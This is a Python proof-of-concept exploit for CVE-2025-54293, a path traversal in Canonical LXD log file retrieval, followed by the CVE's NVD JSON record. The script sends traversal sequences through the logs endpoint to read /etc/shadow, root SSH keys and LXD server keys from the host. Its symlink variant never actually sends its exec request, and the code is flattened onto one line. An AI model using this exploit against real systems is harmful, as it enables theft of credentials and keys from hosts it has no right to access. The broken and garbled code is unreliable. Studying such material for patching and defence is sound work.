CVE-2025-54293

# CVE-2025-54293 PoC - LXD Path Traversal via Log File Retrieval # This PoC demonstrates the path traversal vulnerability in Canonical LXD 5.0 LTS # that allows authenticated remote attackers to read arbitrary files on the host system. import requests import json # LXD API endpoint LXD_URL = "https://lxd-host:8443" # Attacker credentials (low-privilege authenticated user) CERT_PATH = "/path/to/client.crt" KEY_PATH = "/path/to/client.key" VERIFY_SSL = False def authenticate(): """Authenticate to LXD API using client certificate""" session = requests.Session() session.cert = (CERT_PATH, KEY_PATH) session.verify = VERIFY_SSL return session def exploit_path_traversal(session, instance_name, target_file): """ Exploit path traversal in log file retrieval to read arbitrary host files. :param session: Authenticated requests session :param instance_name: Name of a valid container/instance the attacker has access to :param target_file: Path on the host system to read (e.g., "/etc/shadow") """ # Craft malicious log file name with path traversal sequence # The log file retrieval endpoint expects a log file name, but fails to # sanitize path traversal characters malicious_log_name = f"../../../../../../..{target_file}" # Construct the API endpoint for log file retrieval # LXD API: /1.0/instances/{name}/logs/{filename} endpoint = f"{LXD_URL}/1.0/instances/{instance_name}/logs/{malicious_log_name}" print(f"[*] Sending path traversal request to read: {target_file}") response = session.get(endpoint) if response.status_code == 200: print(f"[+] Successfully retrieved file contents:") print("-" * 60) print(response.text) print("-" * 60) return response.text else: print(f"[-] Request failed with status code: {response.status_code}") print(f"[-] Response: {response.text}") return None def exploit_symlink(session, instance_name, target_file): """ Alternative exploitation method using symbolic links within a container. :param session: Authenticated requests session :param instance_name: Name of the container the attacker controls :param target_file: Target file on the host to read """ # Step 1: Execute command inside container to create a symlink # pointing from a log file location to the target host file cmd = { "command": [ "ln", "-s", target_file, f"/var/log/lxd/{instance_name}/lxc.log" ], "environment": {}, "wait-for-websocket": False } exec_endpoint = f"{LXD_URL}/1.0/instances/{instance_name}/exec" print(f"[*] Creating symlink inside container {instance_name}") # Note: This requires exec privileges on the instance # Step 2: Request the log file which now follows the symlink log_endpoint = f"{LXD_URL}/1.0/instances/{instance_name}/logs/lxc.log" response = session.get(log_endpoint) if response.status_code == 200: print(f"[+] Successfully read host file via symlink:") print(response.text) return response.text if __name__ == "__main__": # Authenticate to LXD session = authenticate() # Target sensitive files on the host target_files = [ "/etc/shadow", "/root/.ssh/id_rsa", "/etc/lxd/server.crt", "/etc/lxd/server.key" ] # Exploit using path traversal in log file name for target in target_files: result = exploit_path_traversal(session, "target-instance", target) if result: print(f"\n[!] Sensitive data extracted from {target}") break

{"cve": {"id": "CVE-2025-54293", "sourceIdentifier": "[email protected]", "published": "2025-10-02T11:15:30.540", "lastModified": "2025-12-10T19:31:47.857", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Path Traversal in the log file retrieval function in Canonical LXD 5.0 LTS on Linux allows authenticated remote attackers to read arbitrary files on the host system via crafted log file names or symbolic links."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:canonical:lxd:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "5.21.4", "matchCriteriaId": "FE33A015-C527-4726-8CBE-6EC6420B8933"}, {"vulnerable": true, "criteria": "cpe:2.3:a:canonical:lxd:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndExcluding": "6.5", "matchCriteriaId": "14733993-3FD6-4F2E-8379-670FC1E562E4"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}]}]}], "references": [{"url": "https://github.com/canonical/lxd/security/advisories/GHSA-472f-vmf2-pr3h", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/canonical/lxd/security/advisories/GHSA-472f-vmf2-pr3h", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}